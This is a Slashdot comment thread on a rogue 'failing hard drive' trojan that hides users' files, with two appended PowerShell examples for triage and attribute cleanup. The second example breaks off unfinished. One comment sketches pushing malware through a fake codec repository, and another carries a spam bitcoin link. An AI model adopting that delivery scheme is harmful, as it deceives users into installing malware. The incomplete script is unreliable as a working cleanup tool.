    20. Re:When web apps... by Anonymous Coward · · Score: 0

      Unless the popup in the browser has access to full-screen mode through, say, Flash, or a crappy HTML5 video implementation. Then it's just a matter of guessing what the user's desktop looks like. This is easier than it sounds, when you have their UA string and assume the browser is maximized... you only have to get close enough that they only notice the big change (dimming), and not the simultaneous little changes (differences between the dimmed and original image).

    21. Re:When web apps... by Anonymous Coward · · Score: 0

      > If you impose behavior limits, like "don't click on ads, don't install random programs, do not run as root, stay updated" then Windows become quite safe too. Sure, there are remote vulnerabilities, but I really doubt that, say, Firefox or Flash on Linux is completely safe (if so, why the Windows versions have bugs?). Running as limited user will limit the malware to just screwing up the user's files which, on a single-user system is almost as bad as screwing up the whole system (if malware deleted all my files, I might as well format and reinstall).

      Bullshit. Backups (real ones, that live someplace outside your computer) are essential, of course, but it's trivial to set up a cron job making a pseudo-backup of your important documents, up to and including your entire home directory if you wish, to the free space inside your machine. If you exclude any downloaded videos and music, 1TB will last most people well over a year without automatic cleaning of old files (which I advise against -- too easy to make silly mistakes that will clean your whole pseudobackup drive once a year, too much work to do the requisite testing to prove you didn't make one.) (If you haven't got a TB free, it starts about $50 these days, and any old drive is fine for this -- light usage, no performance requirements, and you're not depending on it for backup-level reliability.)

      You can have this pseudobackup read-only accessible or even completely inaccessible (for better privacy of deliberately deleted files) to your account under ordinary circumstances, but when malware fucks your home directory without compromising root, you just create a new user account, copy the relevant stuff into it, and you're straight back in business, insanely faster than a full reinstall and restoration from offline (i.e. real) backups. Good for those damn-i-feel-like-a-noob moments when you accidentally delete the wrong file, too.

      And that applies to Windows as well as Linux, of course -- a bit harder to set up IMO, though that may be a matter of my background, but perfectly doable. And why the hell wouldn't you?

    22. Re:When web apps... by Black+Parrot · · Score: 1

      Actually, the summary reads like an April Fool's joke about Windows95.

      --
      Sheesh, evil *and* a jerk. -- Jade
    23. Re:When web apps... by christian.ost · · Score: 1

      > And tell us how you would do that? How would you make a web page that convinces the user that they should click 'okay' on your installer instead of going to the system app center / repositories?

      Some distributions have become better at it recently but it used to be the norm that after setting up a desktop linux box you would have to add at least 1-3 3rd party repositories to get non-free software (graphics drivers, adobe stuff, ...) and software of dubious legality (DVD playback, msfonts, media codecs, ...).

      I also remember very well having to install some early OOo versions into /opt via a standalone binary installer because the distribution I used at the time didn't include it at all.

      So to answer your question - I would tell the user that he is missing media codecs for some obscure video format and ask him to add the repository containing my "fake" codec packages to his package manager. That way I can make sure he is always running the latest version of my malware.

      There are also linux-based software distribution systems that bypass a distro's package manager - klik, Zero Install, Autopackage, RUNZ, ...

    24. Re:When web apps... by Anonymous Coward · · Score: 0

      > but when malware fucks your home directory without compromising root, you just create a new user account, copy the relevant stuff into it, and you're straight back in business,

      How would you be sure that hasn't happened? The malware could have used privilege escalation exploits.

    25. Re:When web apps... by snemarch · · Score: 1

      > And tell us how you would do that? How would you make a web page that convinces the user that they should click 'okay' on your installer instead of going to the system app center / repositories?

      > People that were conditioned to Windows might fall for it, but people that 'learned' Linux would know it's BS.

      And that's only true because there's such a small percentage of people that use Linux, and they generally aren't Clueless Joe User types.

      > How would you convince someone to give you the admin ID when they didn't launch an installer or app that needs admin access?

      Linux never had local privilege exploits, nah-uh.

      > VIRUSES IN LINUX DON'T PROPAGATE BECAUSE LINUX DOESN'T WORK LIKE WHAT YOU'RE USED TO.

      THERE ISN'T A LOT OF MALWARE FOR LINUX BECAUSE LINUX ISN'T SIGNIFICANT MARKET-SHARE WISE. There, ftfy.

      --
      Coffee-driven development.
    26. Re:When web apps... by snemarch · · Score: 1

      Good scheme, but do you expect Joe Burgerflipper and Grand Ma to do such a setup? They're the ones that usually get hit by malware.

      --
      Coffee-driven development.
    27. Re:When web apps... by somersault · · Score: 1

      If you change XP to the silver theme, and the browser pops up a blue warning box, you know it's not real. I know people who would fall for a fake message no matter what it looks like, but little details like that would help intermediate users.

      I especially hate downloading stuff from free hosting sites like rapidshare or CNET, because without an adblocker installed, they have about 6 "download" buttons sometimes, 5 of which will be ads.

      --
      which is totally what she said
    28. Re:When web apps... by Anonymous Coward · · Score: 0

      This high definition codec is new and not yet available from the default repositories. Add the following repository and install the package "weownu" to see huge tits in high definition 3D!

    29. Re:When web apps... by h4rr4r · · Score: 1

      > THERE ISN'T A LOT OF MALWARE FOR LINUX BECAUSE LINUX ISN'T SIGNIFICANT MARKET-SHARE WISE. There, ftfy.

      Ask for a tour of your nearest datacenter.

      Your idiotic caps made me write this sentence calling you an idiot to get the lameness filter to shut up.

    30. Re:When web apps... by snemarch · · Score: 1

      > THERE ISN'T A LOT OF MALWARE FOR LINUX BECAUSE LINUX ISN'T SIGNIFICANT MARKET-SHARE WISE. There, ftfy.

      > Ask for a tour of your nearest datacenter.

      You don't target datacenters with consumer-oriented malware. You target them with DDoSes or specialized attacks to get specific information you're interested in, often involving exploits that aren't known by the public. It's a whole different ballpark.

      > Your idiotic caps made me write this sentence calling you an idiot to get the lameness filter to shut up.

      Idiotic caps because the parent had idiotic caps.

      --
      Coffee-driven development.
    31. Re:When web apps... by 3vi1 · · Score: 1

      >> "Viruses" don't propagate in Linux because nobody fucking uses Linux.

      Right. All web servers run IIS. Right. No one wants to hack web servers. Right.

      People that claim Linux isn't targeted because it has no market share have no clue. I'll bet you use Linux every day, whether you know it or not.

  7. TLD4 Variant? by terbo · · Score: 1

    I think this is a TLD4 variant, I've had to remove it several times over the past several months, pretty persistent but the usual.

    --
    If you're interested in facts I'll tell you what they are and I'll give you sources - Chomsky on The Big Idea
    1. Re:TLD4 Variant? by Mashiki · · Score: 1

      That one, and the new TSS variants floating around are...painful. Nuking the machine from orbit and restoring from a clean backup is almost easier than removing them. The last machine I cleaned from one of the new TSS variants took nearly 5 hours. The infection point was some bloody facebook page.

      The stupid it burns sometimes.

      --
      Om, nomnomnom...
    2. Re:TLD4 Variant? by pspahn · · Score: 1

      Oblig. Friendface

      --
      Someone flopped a steamer in the gene pool.
    3. Re:TLD4 Variant? by kvvbassboy · · Score: 1

      It's been a long time since there was malware in my computer. How exactly do these things get inside, in the first place?

      Once they get installed into a computer, do they spread throughout the local network?

    4. Re:TLD4 Variant? by Anonymous Coward · · Score: 0

      This particular one? Either a browser exploit distributed as a banner ad, letting it run automatically in IE8 if you visited rlslog.net (or anyone else using the same ad network) about a week ago, or plain stupid user-clicks-on-everything in less borken browsers. If you actually get the malware, and then pretend to be a semi-trained monkey and click "Yes, please install this obviously fake software fix for the hardware problem you're giving me obviously fake warnings about", follow through with your credit card, and let it sit on your machine, I have no clue if it has the ability to spread over the network, but it seems unlikely.

  8. I saw this today by CmdrPorno · · Score: 1

    It certainly takes it a step further than "your system is infected." Ironically, the system actually does appear to have a bad hard drive (bad blocks marked by CHKDSK). Customer had paid someone else to replace the hard disk a little over a month ago and showed me the receipt, but the hard disk in the machine was the same capacity as the OEM disk and had a date code indicating that it was likely not a new drive, but the one that was factory installed.

    They're just going to replace the machine since the "infected" one has Vista and, for that reason, will run badly even after it's fixed properly (and honestly). The linked article provides a location where the malware hides the user data.

    --
    Sent from my iPhone
  9. Been around a bit by zvar · · Score: 1

    Umm... This has been around for a few months.

  10. Bad news day, I'm guessing by knotprawn · · Score: 1

    There are quite a few windows bugs out there. This one makes changes to the registry and moves files and folders around. Most of the other bugs do that anyway. I didn't read the whole article, of course, but it seems like this isn't really all that news-worthy. The only difference that I can see is that it moves more stuff around than the other bugs. Or perhaps there was a point and I missed it.

    1. Re:Bad news day, I'm guessing by somersault · · Score: 1

      In our world, that word doesn't mean what you think it means. You should say "malware" and not "bugs". Bugs are mistakes in the design or creation of a computer program.

      Malware can find its way into your system via bugs, but viruses and other types of malware are not bugs.

      --
      which is totally what she said
    2. Re:Bad news day, I'm guessing by knotprawn · · Score: 1

      Sorry about that, point accepted. Given that everyone's a doctor at home and given the interchangeable usage of the terms viruses and bugs (biologically speaking, of course), I extrapolated the interchangeability to the computer domain. Unintentional, purely.

  11. Chimera, Bellerophon by Anonymous Coward · · Score: 0

    Reminds me of the plot of Mission:Impossible 2.

  12. How could one differentiate ... by PPH · · Score: 0

    ... between this malware and normal Windows behavior?

    --
    Have gnu, will travel.
    1. Re:How could one differentiate ... by Mashiki · · Score: 1

      Well, normal Windows behavior means that under a LUA, you can't do squat. I mean, you are using LUAs, right? So, how often do you see hive collapses? I can count them on one hand, over the last 10 years. However malware behaving like this has been off-on again for the last 5ish years.

      --
      Om, nomnomnom...
    2. Re:How could one differentiate ... by Anonymous Coward · · Score: 0

      Well, normal Windows behavior means that under a LUA, you can't do squat. I mean, you are using LUAs, right? So, how often do you see hive collapses? I can count them on one hand, over the last 10 years. However malware behaving like this has been off-on again for the last 5ish years.

      Malware that steals passwords, credit card info, ... generally does not need any privileged access to run. Rooting the box is really secondary when you can get all the info you want by running from an unprivileged account (e.g. a malicious browser plugin that harvests credit card info from web forms and is installed by the unknowing user somewhere in .mozilla?).

  13. We had this one. by Anonymous Coward · · Score: 0

    Unfortunately there are recurrent strains: it attacked our Windows XP, which became slower and slower, and errors started to show up.

    We solved by buying Vista; this one, too, became heavy to a point the machine barely worked.

    We solved again by acquiring Windows 7, a very simplified and clean desktop. Very nice. This must be that Zen "less-is-more" thing: less things on screen and more money goes away...

    Today I noticed gvim had some trouble starting a macro (but when it works, after some 20 seconds, it's fast as usual).

    Do you think we could pay in advance to M$ to help them accelerate Windows 8 release? Didn't they have a software insurance program?

  14. happened last week by Anonymous Coward · · Score: 0

    This happened to a computer I worked on last week. The malware set the hidden attribute on all the Start menu icons, and also the My Documents files, so it looked like everything was lost. There might have been a couple of other changes, but I can't remember. Didn't take me 5 minutes to fix it all, and Malwarebytes removed the hoax program for me.
    I can see how it would mess with other users and give some people a scare. Old trick, but it worked.

  15. Am I the only one... by Anonymous Coward · · Score: 0

    That would just buy a new hard drive?

  16. 4 instances of attrib running by Anonymous Coward · · Score: 0

    I've had a few users get one recently that, upon opening taskmgr (thank goodness for LANDesk) had 4 instances of attrib.exe running. Ends up setting every file on the drive to Hidden, System and Read-Only. A PITA to fix remotely. I wish I could get our security guys to add Adobe & Java updates to the critical security patch list.
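    As an added triage example (not the commenter's tooling and not code from the linked write-ups): the symptom above, several `attrib.exe` instances in Task Manager, is worth more than a kill, because `attrib.exe` is a legitimate Windows binary and the interesting process is whatever spawned it. The script below lists each running `attrib.exe` with its command line and walks up the parent chain, marking any ancestor that executes from a user-writable location. The "user-writable location" heuristic, the depth limit and the `Get-AttribTriage` function name are assumptions of this example, not anything the thread states; it uses `Get-WmiObject` so it runs on the Windows PowerShell 2.0 found on XP/Windows 7 boxes of the period.

    ```powershell
    # Added triage example, not code from the article or from the commenter above.
    # Lists every running attrib.exe with its command line and walks up the parent chain,
    # marking ancestors that run from a user-writable location (rogues of this kind tend
    # to live under %TEMP% or %APPDATA%; that heuristic and the depth limit are assumptions).

    # Roots a regular user can write to; unset variables (XP has no LOCALAPPDATA) are dropped.
    $UserWritableRoots = @($env:TEMP, $env:APPDATA, $env:LOCALAPPDATA, $env:USERPROFILE) |
        Where-Object { $_ }

    function Test-UserWritablePath {
        param([string]$Path)
        if (-not $Path) { return $false }   # protected processes report no ExecutablePath
        foreach ($root in $UserWritableRoots) {
            if ($Path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { return $true }
        }
        return $false
    }

    function Get-ParentChain {
        # Walks ParentProcessId upwards. PIDs are reused, so if a parent has already exited
        # the chain may jump to an unrelated process; $MaxDepth and $seen stop runaway loops.
        param([uint32]$ProcessId, [int]$MaxDepth = 6)
        $chain = @()
        $seen  = @{}
        $proc  = Get-WmiObject -Class Win32_Process -Filter "ProcessId = $ProcessId"
        while ($proc -and ($chain.Count -lt $MaxDepth) -and -not $seen.ContainsKey($proc.ProcessId)) {
            $seen[$proc.ProcessId] = $true
            $chain += $proc
            $proc = Get-WmiObject -Class Win32_Process -Filter "ProcessId = $($proc.ParentProcessId)"
        }
        return $chain
    }

    function Get-AttribTriage {
        # One object per attrib.exe instance, carrying the ancestry that spawned it.
        $report = @()
        foreach ($attrib in Get-WmiObject -Class Win32_Process -Filter "Name = 'attrib.exe'") {
            $ancestors = @(Get-ParentChain -ProcessId $attrib.ParentProcessId | ForEach-Object {
                New-Object PSObject -Property @{
                    Pid          = $_.ProcessId
                    Name         = $_.Name
                    Path         = $_.ExecutablePath
                    UserWritable = Test-UserWritablePath $_.ExecutablePath
                }
            })
            $report += New-Object PSObject -Property @{
                AttribPid   = $attrib.ProcessId
                CommandLine = $attrib.CommandLine
                Ancestors   = $ancestors
                Suspicious  = [bool]($ancestors | Where-Object { $_.UserWritable })
            }
        }
        return $report
    }

    foreach ($row in Get-AttribTriage) {
        Write-Host ("attrib.exe PID {0}: {1}" -f $row.AttribPid, $row.CommandLine)
        foreach ($a in $row.Ancestors) {
            $mark = if ($a.UserWritable) { '  <-- user-writable location' } else { '' }
            Write-Host ("    parent {0} {1} {2}{3}" -f $a.Pid, $a.Name, $a.Path, $mark)
        }
    }
    ```

    Once the spawning parent is identified, stop that process (`Stop-Process -Id <pid> -Force`) before the `attrib.exe` children, otherwise it simply launches more of them; the command lines captured here also tell you which attributes (H, S, R) the variant on this box is setting, which decides how the files have to be put back.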

  17. My end users say it was coming from MSNBC.com by gunkthruster · · Score: 1

    ...my day was spent removing this bastard from our work machines. Good day to be a help desk lackey.

    1. Re:My end users say it was coming from MSNBC.com by Mashiki · · Score: 4, Insightful

      And sites complain when people block ads. This is of course why anyone with a brain blocks ads.

      --
      Om, nomnomnom...
    2. Re:My end users say it was coming from MSNBC.com by Archangel+Michael · · Score: 1

      If malware is coming from ads on websites, then someone ought to sue the websites for the infections they are causing. Maybe if we hold the intermediaries accountable for the crap people are seeing while visiting their sites then we can slow it down.

      --
      Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
  18. Ah by jav1231 · · Score: 1

    Windows...move along.

  19. bitcoin by Anonymous Coward · · Score: 0

    After their creditcard access is limited, they might turn to bitcoins, hope they don't, then someone will look for a way to shut down btc access.
    bit.ly/btcbonus for a few free coins
    I'm not anon I forgot my pw and I'm locked out of last pass while on my phone -opticbit

  20. Just ran into this yesterday and by Mithrilhall · · Score: 1

    it seemed pretty easy to clean. We ran cmd to launch taskmgr.exe as the local administrator. Then we were able to kill the processes. Once that was done, Malwarebytes took care of the infected files. After that was done we had to use a System Restore point from a few days before the infection.

    1. Re:Just ran into this yesterday and by FlyingGuy · · Score: 1

      Wouldn't a simpler way be, every time IT touches a machine, to get a backup of the registry (a clean one) or, better yet, simply have a default registry on hand? Pop in the install CD, go into repair mode and restore the registry to your company defaults.

      Another way would be to perhaps take the infected registry and then compare it to the infected registry and you will find every trace of the damn thing, yes?

      --
      Hey KID! Yeah you, get the fuck off my lawn!
    2. Re:Just ran into this yesterday and by amliebsch · · Score: 1

      That's what system restore does, it backs up the registry hives.

      --
      If you don't know where you are going, you will wind up somewhere else.
  21. oh! i Love looking at website that infect windows by geekthecat · · Score: 1

    Add links so all of us with GNU/Linux can check it out, please.

  22. Ugh by ModernGeek · · Score: 1

    I'm so confused. Why do the antivirus / anti-malware packages out there not detect and delete these stupid things?

    I know that the stupid XP Antivirus even sets a key in the registry that marks .EXE files as "safe file"

    I assume that means that IE will then open and execute any .EXE that heads its way.

    It seems that removing these infections involves the tedious process of booting the hard drive from another machine, and manually picking it all clean.

    Only then does the registry have to be picked through with a fine-tooth comb to keep more infections from arising.

    I've seen some where Windows Explorer is set as being the actual virus, so that when an AV program deletes it, one cannot log in.

    I know that Windows is horrible, and it is not used within my enterprise, but how is it that these infections are able to even exist? Where do they come from?

    --
    Sig: I stole this sig.
    1. Re:Ugh by atlasdropperofworlds · · Score: 1

      Actually, the OP has linked to something that is being discussed on a blog at symantec, but it's not claimed to be new.

      A user actually has to download and execute the trojan. It doesn't exploit the system. In this case, as is often the case these days, the problem is between the keyboard and chair.

    2. Re:Ugh by Anonymous Coward · · Score: 0

      I'm so confused. Why do the antivirus / anti-malware packages out there not detect and delete these stupid things?

      I know that the stupid XP Antivirus even sets a key in the registry that marks .EXE files as "safe file"

      Because malware must first be identified and then the signature added to a database. Trouble is, if the jerks that write the crap do a simple mod then the malware is off the radar. So you have a situation created by jackasses creating binaries that can spread to users, and because the binary is closed it can only be modded by the creator. So we have huge companies taking advantage of the fact that Windows closed-binary malware needs to be reversed and catalogued before it can be effectively dealt with. The whole antivirus and spyware crap could very easily be dealt with if no software were allowed to be distributed without the source code. Copyright the source for closed source, copyleft for open source. Insist that source code is available before installing anything on Windows or any operating system.
      That way anybody that steals your specific source can be taken to task under copyright law. Get rid of the stupid idea that software can be patented!

      This is why I only run software that has available code. There are some exceptions like Flash and Acrobat Reader and yes, they can cause trouble. But how do you get an infection from Flash on Linux? Show me one case of this occurring! Otherwise all these Windows fanboys please just STFU about the insecurity of Adobe Flash and acroread and how Linux would be just as bad as Windows if the market share was reversed.

    3. Re:Ugh by NJRoadfan · · Score: 1

      Malwarebytes has been picking up the changed registry keys on recent definition updates. The major AV packages from Symantec and McAfee aren't effective against any of the most common malware attacks. It's quite sad to read their support forums where people complain they paid big $$$ for an endpoint protection client site license from the big vendors and the malware still goes undetected. One GOOD thing is 64-bit versions of Windows are immune from most of the nasty stuff for the time being (32-bit DLLs can't inject themselves into the 64-bit versions of Explorer or Winlogon).

    4. Re:Ugh by Billly+Gates · · Score: 1

      Most do if they have active protection.

      A few years ago XP Antivirus was also called Antivirus 2009, which cloned Norton Antivirus 2009 exactly in order to confuse the users. Many users with trial antivirus software thought they were protected, so no warning or prevention happened at all.

      Those that knew they had unactivated copies of Norton Antivirus 2009 googled "Antivirus 2009", found what looked just like it and installed it that way. Very sleazy. XP Antivirus did not work as popularly but was the same program under a different name.

      I wonder if trialware antivirus software even stops users from running these programs today? ... For removing it, the best instructions I know are simply to use a restore CD and wipe it. You can't get rid of it. Even if you use your hidden partition to restore your machine it will hide itself in a hidden part of the disk partition table and reinstall itself. Using the actual CD, if you are lucky enough that the OEM included one, is the only way to wipe this nasty program. Very sleazy indeed.

    5. Re:Ugh by WuphonsReach · · Score: 1

      I'm so confused. Why do the antivirus / anti-malware packages out there not detect and delete these stupid things?

      Because anti-virus and anti-malware tools are reactive.

      There will always be a lead time between when the malware hits the wild and when anti-virus and anti-malware vendors update their signature databases. That time period can range from hours to months.

      (Yet another reason to browse in a way that only whitelisted sites are allowed to do fancy things. It may be a PITA, but it drives down the risk of infection by a few orders of magnitude.)

      --
      Wolde you bothe eate your cake, and have your cake?
    6. Re:Ugh by snemarch · · Score: 1

      There are some exceptions like Flash and Acrobat Reader and yes, they can cause trouble. But how do you get an infection from Flash on Linux? Show me one case of this occurring! Otherwise all these Windows fanboys please just STFU about the insecurity of Adobe Flash and acroread and how Linux would be just as bad as Windows if the market share was reversed.

      I'll show you as soon as Linux has enough marketshare that people start writing malware for it :-)

      The attack vectors are there - Flash, Acrobat Reader, Java, FireFox. If a piece of malware wanted root, there's been enough local privilege exploits around and there's bound to be more.

      You and I both keep our Linux systems up to date, and don't click spurious links or enter our user credentials where we shouldn't. I expect that goes for most Linux users as the userbase looks right now. But do you expect that situation to stay constant if there was going to be a mass migration towards Linux?

      --
      Coffee-driven development.
  23. Legal action? by morikahnx · · Score: 2

    If the company in question is linked to the trojan, can we take legal action against them? It looks like an open and shut case.

  24. Re:woderful blog by morikahnx · · Score: 1

    Crap, my post is right above this spam.

  25. Ridiculously stupid by Arancaytar · · Score: 1

    There was a virus a while back that used an extortion scheme that was similar: Encrypt the data, wipe the original, then outright sell the key. That one's kind of scary. A simple disinfection wouldn't undo the damage, and since it wouldn't depend on permanent infection it might affect any platform. This one is less upfront about it, but won't fool anyone who has any clue about computers or hard drives.

    On the other hand, maybe a lot of users are too clueless to be affected. "Help, there are all these error messages and files keep disappearing, do I have a virus?" "Yes, yes you do."

  26. Umm... by iMouse · · Score: 1

    Again, Slashdot is late to the party. This has been going on for the last month.

    The malware is performing an attrib +h on all files in C:\. If you attrib -h on the whole drive, the data reappears. Magic.

  27. What's the fix for this? by Anonymous Coward · · Score: 0

    I have this on a desktop I seldom use - but that box does have some material I'd like to save
    What's the fix?

  28. Administrator? by Anonymous Coward · · Score: 0

    Operating systems are still running user applications as an administrative user? I sign into my systems as a regular user, and I execute applications as a regular user. Administrative privileges should be for approved installation and removal of applications. On the other hand, It's silly to think that in this day and age, malicious behavior isn't automatically detected by the operating system and squashed - and I don't mean by an anti-virus or anti-malware application that one needs to purchase. Operating systems should have security built-in, not tacked-on later.

    1. Re:Administrator? by amliebsch · · Score: 1

      No, but you don't need administrative privileges to set the hidden flag on the user's own files.

      --
      If you don't know where you are going, you will wind up somewhere else.
  29. Administrative Access? by theamarand · · Score: 2

    Operating systems are still running user applications as an administrative user? I sign into my systems as a regular user, and I execute applications as a regular user. Administrative privileges should be for approved installation and removal of applications. On the other hand, It's silly to think that in this day and age, malicious behavior isn't automatically detected by the operating system and squashed - and I don't mean by an anti-virus or anti-malware application that one needs to purchase. Operating systems should have security built-in, not tacked-on later.

    1. Re:Administrative Access? by snemarch · · Score: 1

      Operating systems should have security built-in, not tacked-on later.

      ...anti-competitive lawsuit.

      --
      Coffee-driven development.
  30. How the fuck! by FlyingGuy · · Score: 1

    How can this still be happening!

    I run FF 4.x on an openSUSE 11.x box and on a Windows XP box. I have actually experimented; both FF installs are default. On the Linux box the same stupid screen comes up: "scanning your hard drive, you have 99 million viruses, click OK to get rid of them."

    FF on the Linux box: you click OK and FF prompts you that such and such a site wants to do some shit with some executable file; tell it no, close the tab and you are OK.

    FF on the XP box: you click OK and you are off to the races trying to get the crap-ware off of your computer!

    Now can someone please explain just why the fuck that is?

    Can someone explain why drive-bys can happen AT ALL, and how come the code that allows this sort of shit to happen has not been ripped out with extreme prejudice after the very first occurrence of this behavior?

    Perhaps there is a browser author in the mighty /. world who will step up and explain this?

    --
    Hey KID! Yeah you, get the fuck off my lawn!
    1. Re:How the fuck! by WuphonsReach · · Score: 1

      Can someone explain why drive-bys can happen AT ALL, and how come the code that allows this sort of shit to happen has not been ripped out with extreme prejudice after the very first occurrence of this behavior?

      Because you're letting random websites run code (Javascript, Flash, PDF, Java) on your computer. And even though that code is sandboxed (by Flash or Java or JavaScript or Adobe PDF Reader) there are flaws in those sandboxes that allow for arbitrary execution of code. Which then lets the little nasty critter out of the sandbox and into your user profile where it can dig in and make itself comfortable.

      --
      Wolde you bothe eate your cake, and have your cake?
    2. Re:How the fuck! by snemarch · · Score: 1

      "Click yes" is a PEBKAC problem - not much we can do about those.

      Drive-by attacks are generally against Flash, Acrobat Reader, Java and there's not much the browser or OS can do against those. There's lots of harm you can do even as an unprivileged user, and if that's not enough there's local privilege escalation exploits on all the major OSes.

      --
      Coffee-driven development.
  31. What a scam! by CrazyJim1 · · Score: 2

    If your hardrive is failing, software won't fix it. This could be as funny as creating a virus to say your computer's flux capacitor is overheating and you'll need to buy a replacement through exmechanicgoneonlinescammer.com

    1. Re:What a scam! by Anonymous Coward · · Score: 0

      If your hardrive is failing, software won't fix it. This could be as funny as creating a virus to say your computer's flux capacitor is overheating and you'll need to buy a replacement through exmechanicgoneonlinescammer.com

      Your har drive? Agreed, if your laughing impulse is impaired, software won't fix it. (Also, har.)

    2. Re:What a scam! by snemarch · · Score: 1

      If your hardrive is failing, software won't fix it.

      WRONG! There's SpinRite - it zomgmagic fixes harddrives, several thousand circle-jerking lemmings can't be wrong!

      --
      Coffee-driven development.
    3. Re:What a scam! by Anonymous Coward · · Score: 0

      I know that. You know that. But try explaining that to someone who doesn't know or care what the differences between hardware and software are.

    4. Re:What a scam! by Anonymous Coward · · Score: 0

      Amazingly enough, some of the false errors it displays say as much. One of them says something like "Memory failure emminent. Urgently run memory defrgmenter to resolve bad memory block 0x02b"

      gad_zucki: I raise your "oh really" with an "oh absolutely". IE9 is not being widely deployed in the corporate environment, and for a few good reasons. One of which is, though it is definitely more secure, it is a piece of crap browser with plenty of compatibility issues.

  32. at least partially truthful sarcasm by Anonymous Coward · · Score: 0

    What are you talking about? We're living in the future now; these are things of the past. My information and personal identity are safe and secure on the internet. I even reset my PSN password because I knew my birthdate.

  33. Malwares so retro by Anonymous Coward · · Score: 0

    Viruses, worms, malwares, and evilwares are so retro. Install linux and forget about it.

  34. Been There Done That by Tablizer · · Score: 1

    I had that virus about 3 months ago. Wallpaper black, missing icons, drive failure message, which lead to fix-it purchase site. The computer was 8 years old so I gave up on it and got a new one. Maybe I'll turn it into an Ubuntu box for the kids.

    It was my fault for turning off Windows Update because our connection is spotty here and the updates made it crawl.

  35. won't work in XP by Anonymous Coward · · Score: 0

    I just re-installed Windows XP (again), and the installer informed me that XP is the most secure Windows operating system, so I doubt XP will be affected by this.

  36. How to fix the damage by smylingsam · · Score: 1

    First, DO NOT delete your temp files. There is a variant that not only hides various files (by setting the hidden attribute) but moves the shortcuts to %temp%\smtmp (a hidden directory). It also reorders the icons.

    see:

    http://www.emagined.com/security-threat/trojan-fakefrag
    http://www.symantec.com/security_response/writeup.jsp?docid=2011-050610-4459-99&tabid=2

  37. An End User at work got this... by jflo · · Score: 0

    I work for a rather large Automotive Supplier, and a guy in our racing division got this thing last week. I ended up pulling his hard drive and connecting it as a secondary on my laptop... I found that I had to change folder options to show hidden files; from there I was able to copy all of his files. Once copied to my hard drive, I had to 'un-hide' everything. I formatted his old drive, reimaged, copied everything back over and was good to go. Problem here, it's almost impossible to fix this remotely, so I had to have the end user overnight his laptop from NC to MI, and then vice versa. 4 day process. Fun time. F*** YOU to whoever wrote this thing.

    --
    WWPD - What Would Picard Do?
  38. A Justice Hole by Anonymous Coward · · Score: 0

    Something I've never really understood with these guys is how they manage to hang around. The malware people are the same folks as the "repair" people, looking to sell software to fix their problems, yes? So why can't we follow the money and have these people arrested or killed if they resist?

    Crossing a border won't protect those people if they can be identified.

  39. Hidden not moved to temp location by malignant_minded · · Score: 1

    From the variants I have seen it doesn't move the files, it simply marks all files and folders as hidden. Some have only affected the user's profile while others the whole drive. Also dumb programs like "unhide" that run to make correcting this simpler also make Local Settings and Application Data (XP) visible rather than hidden, so they don't really put things back correctly, and you could probably do the same thing at the root of the file system recursively at the command line.
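    The three points made by commenters above (the whole-drive `attrib +h` that an `attrib -h` reverses, the warning not to empty `%temp%` because a variant stashes shortcuts in `%temp%\smtmp`, and the caveat that blanket "unhide" tools also expose Local Settings and Application Data) fit into one cleanup routine. The following script is an added example and is not code from the article, the Symantec or emagined write-ups, or any commenter. It clears the rogue's attribute on a profile while leaving items Windows hides by design alone (junctions, anything marked Hidden+System, and a short list of XP profile names), walks directories by hand so it never follows a junction, and copies stashed shortcuts back. Assumed and to be checked on the box before use: that the rogue's processes are already dead, that you run it elevated as the affected user, and the `$StashMap` layout (which `smtmp\<n>` subfolder belongs to which Start Menu/Quick Launch/Desktop folder); the thread does not give that mapping, so the entries below are placeholders.

    ```powershell
    # Added cleanup example, not code from the article, the linked write-ups, or any commenter.
    # Reverses the rogue's "attrib +h" over a profile and copies stashed shortcuts back, while
    # leaving items Windows hides on purpose hidden, which a blanket "attrib -h /s /d" does not.
    # Assumptions: rogue processes already killed, run elevated as the affected user, and the
    # $StashMap below verified by hand; its smtmp\<n> layout is a placeholder, not from the page.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [string]$Root  = $env:USERPROFILE,
        [string]$Stash = (Join-Path $env:TEMP 'smtmp'),
        # Attribute(s) to strip: Hidden for the common variant; pass 'Hidden,System,ReadOnly'
        # for the variant that set all three.
        [System.IO.FileAttributes]$ClearFlags = 'Hidden',
        [hashtable]$StashMap = @{
            '1' = "$env:ProgramData\Microsoft\Windows\Start Menu"             # assumed mapping
            '2' = "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch"     # assumed mapping
            '4' = "$env:PUBLIC\Desktop"                                       # assumed mapping
        }
    )

    # Leaf names that are hidden by design in a profile (XP folders, hive files, desktop.ini).
    $KeepHidden = @('AppData', 'Application Data', 'Local Settings', 'desktop.ini',
                    'ntuser.dat', 'ntuser.dat.log', 'ntuser.dat.log1', 'ntuser.dat.log2',
                    'ntuser.ini', 'UsrClass.dat')

    function Test-HiddenByDesign {
        param([System.IO.FileSystemInfo]$Item, [int]$Mask)
        $attr = [int]$Item.Attributes
        # Junctions/symlinks: Vista+ profiles hold hidden compatibility links such as
        # "My Documents" -> Documents; never retouch them.
        if (($attr -band [int][System.IO.FileAttributes]::ReparsePoint) -ne 0) { return $true }
        # Windows marks its own hidden files Hidden+System; the common rogue variant sets only
        # Hidden. Leave System-marked items alone unless System itself is being stripped.
        $sys = [int][System.IO.FileAttributes]::System
        if ((($attr -band $sys) -ne 0) -and (($Mask -band $sys) -eq 0)) { return $true }
        return [bool]($KeepHidden -contains $Item.Name)
    }

    function Restore-Visibility {
        [CmdletBinding(SupportsShouldProcess = $true)]
        param([string]$Path, [int]$Mask)
        $fixed = 0
        # -Force is essential: without it Get-ChildItem omits hidden entries, i.e. exactly
        # the files the rogue touched.
        foreach ($item in @(Get-ChildItem -LiteralPath $Path -Force -ErrorAction SilentlyContinue)) {
            $attr = [int]$item.Attributes
            if (-not (Test-HiddenByDesign $item $Mask) -and (($attr -band $Mask) -ne 0)) {
                if ($PSCmdlet.ShouldProcess($item.FullName, "Clear $ClearFlags")) {
                    $item.Attributes = [System.IO.FileAttributes]($attr -band (-bnot $Mask))
                    $fixed++
                }
            }
            # Recurse by hand into real directories only, never junctions (older Get-ChildItem
            # -Recurse follows them: the classic "Application Data" loop on Vista/7).
            if ($item.PSIsContainer -and (($attr -band [int][System.IO.FileAttributes]::ReparsePoint) -eq 0)) {
                $fixed += Restore-Visibility -Path $item.FullName -Mask $Mask
            }
        }
        return $fixed
    }

    function Restore-Stash {
        [CmdletBinding(SupportsShouldProcess = $true)]
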